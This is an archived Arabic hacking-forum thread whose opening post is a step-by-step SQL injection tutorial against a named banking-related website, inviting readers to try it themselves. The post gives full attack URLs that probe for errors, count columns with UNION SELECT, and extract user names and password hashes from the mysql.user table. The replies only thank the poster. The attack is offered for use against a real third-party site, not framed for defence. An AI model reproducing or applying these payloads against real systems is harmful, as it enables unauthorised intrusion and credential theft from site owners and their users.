منتديات الدار داركوم
لوحة تحكمك الخاصة التسجيل معنا والتمتع بكافة مميزات عضوية الاقامة في الدار العودة الى الصفحة الرئيسية شبكة ومنتديات الدار داركوم ,,بيتك على الانترنت   الدخول الى الشبكة اتصل بادارة الموقع عالم من المعرفة شاركنا ارائك وما تحمل في جعبتك من معرفة

القران الكريم مركز التحميل الالعاب  الافلام  التلفزيون  معرض الصور الفيديو  الثيمات توبيكات  دليل المواقع التحميل من اليوتيوب احوال الطقس

مسابقات ومواضيع مميزة : مسابقة قرأت في الدار | مسابقة مطبخ الدار | مسابقة الموضوع المميز | افضل برنامج في الاسبوع |افضل شرح في الاسبوع | جريدة الدار

هذه الرسالة تفيد بأنك غير مقيم معنا. للاشتراك الرجاء اضغط هنــا

العودة   منتديات الدار داركوم > قسم التقني > دار الاختراق و الهاكر > مكتبة الثغرات

الملاحظات


مكتبة الثغرات





إضافة رد
 
LinkBack أدوات الموضوع إبحث في الموضوع انواع عرض الموضوع
  #1 (permalink)  
قديم 11-19-2007, 02:05 PM
الصورة الرمزية الجنيرال
المدير العام
 


الجنيرال تم تعطيل التقييم
افتراضي ثغرات sql + درس سهل + تطبيق على موقع تعالو طبقو

السلام عليكم ياحلوين وش اخباركم هذا درس سهل وتطبيق يعني لاطبقت راح تفهم وش sql




.
اول شي هذي الثغره

كود:
http://www.accountablebanking.com/links.php?link_id=-11  

طبعا نضيف العلامه عشان يطلع الخط بعد الرقم 11ا

اقتباس:
'
عشان نشوف يطلع خطا؟ طلع لنا خطا كذا
كود:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1  

يعني في ثغره ياحلو .. الان .. نضيف

كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2/*  
ويطلع لك كذا

كود:
The used SELECT statements have a different number of columns  
يعني اضف رقم .. واضغط انتر.. تزايديا حتى يختفي الخطا الان اختفى الخطآ الى الرقم

كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11/*  
طلع لي رقمين 5 و 6 يعني االحين راح نظيف اخر شي

كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11+from+mysql.user/*  
شفتو اخر كلمه mysql.user ملاحظه بعض المواقع ماتشتغل عليه غير كلمه mysql.user الى mysql.dbh او information_schema.tables للجدول او admin او user او users الخ ..
بعد ماضفنا طلع لنا 5 + 6 طيب نبدل رقم خمس user ورقم سته password ملاحظه هذاااذا مااشتعل الموقع


كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,user,password,7,8,9,10,11+from+mysql.user/*  
وكذا طلعنا الباسوورد .. ملاحظه انا الحين لاكتبت user برقم خمسه او سته .. يطلع لي يوزر غيـر .. وصراحه ماقدرت اطلع الجداول... ياليت احد يكمل لاني ماني خبره صح نص ونص .

كود:
http://www.accountablebanking.com/links.php?link_id=-11+union+select+1,2,3,4,user,6,7,8,9,10,11+from+mysql.user/*  
واتمنى الشرح نال اعجابكم واي خطآ قولو . ترى الانسان دايما معرض للآخطآ .. وتحيآتي


منقول


مواضيع تفيدك : طريقة رؤية الروابط في المواضيع | طريقة طرح برنامج او موضوع في المنتدى

التوقيع:


اخي العضو..اختي العضوة,,لا حاجة لنذكركم انكم في داركم
هذا الصرح لولاكم لما كان يوما وبكم سيكون في القمة,,تذكروا جيدا اننا لا ندعي القمة انما نسعى للوصول اليها وذلك بفضلكم..لازلنا في البداية لكن المنتدى لن يتحرك خطوة واحدة الا بمجهوداتكم ..وعطائكم وحبكم له, شارك الآخرين أفراحهم وأحزانهم ... ولو بكلمة ...
مهما كانت مشاعرك تجاههم ... فالطيب ... لا يجني
الا الطيب ... وكم من مصائب قربت قلوب...يبقى الحب
هو ما يجمعنا ... ويبقى الجميع تحت مظلة هذا الدار
أخوان وأهل ... فلا تسمحوا لقطيعة أن تدوم ...
ولا تسمحوا لأعمدة هذا الدار... أن تهز يوما

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 11-19-2007, 02:39 PM   رقم المشاركة : [2 (permalink)]
اداري
الصورة الرمزية samiy
 

samiy has a spectacular aura aboutsamiy has a spectacular aura about

samiy غير متواجد حالياً
افتراضي رد: ثغرات sql + درس سهل + تطبيق على موقع تعالو طبقو

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .



 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 11-19-2007, 03:24 PM   رقم المشاركة : [3 (permalink)]
مقيم مميز
 

همسات الجمال is on a distinguished road

همسات الجمال غير متواجد حالياً
افتراضي رد: ثغرات sql + درس سهل + تطبيق على موقع تعالو طبقو

السلام عليكم ورحمة الله وبركاته
راااااائع ها هنا لا يوجد صعب
ههههههههههههههههه
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .



 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 03-01-2008, 05:26 PM   رقم المشاركة : [4 (permalink)]
مشرفة سابقة
الصورة الرمزية أمـــــــــل
 

أمـــــــــل is a jewel in the roughأمـــــــــل is a jewel in the roughأمـــــــــل is a jewel in the rough

أمـــــــــل متواجد حالياً
افتراضي رد: ثغرات sql + درس سهل + تطبيق على موقع تعالو طبقو

مشكوووووووووووور يا أخي عبد الرفيع

الله لا يحرمنا منك و لا من مواضيعك



التوقيع:


 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 06-22-2008, 09:02 PM   رقم المشاركة : [5 (permalink)]
مراقب القسم الثقافي
الصورة الرمزية rida
 

rida is on a distinguished road

rida غير متواجد حالياً
افتراضي رد: ثغرات sql + درس سهل + تطبيق على موقع تعالو طبقو

شـكــ وبارك الله فيك ـــرا ...


التوقيع:


 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

 search engine list sitemap_index.xml.gz Sitemap.html خريطة المنتدى  

  

ملاك غير

دليل

نص

نص

نص

نص

نص

نص



الساعة الآن 02:02 AM.
Powered by vBulletin® Version 3.7.4, Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0 TranZ By Almuhajir
كل الحقوق محفوظة لمنتديات الدار دار كوم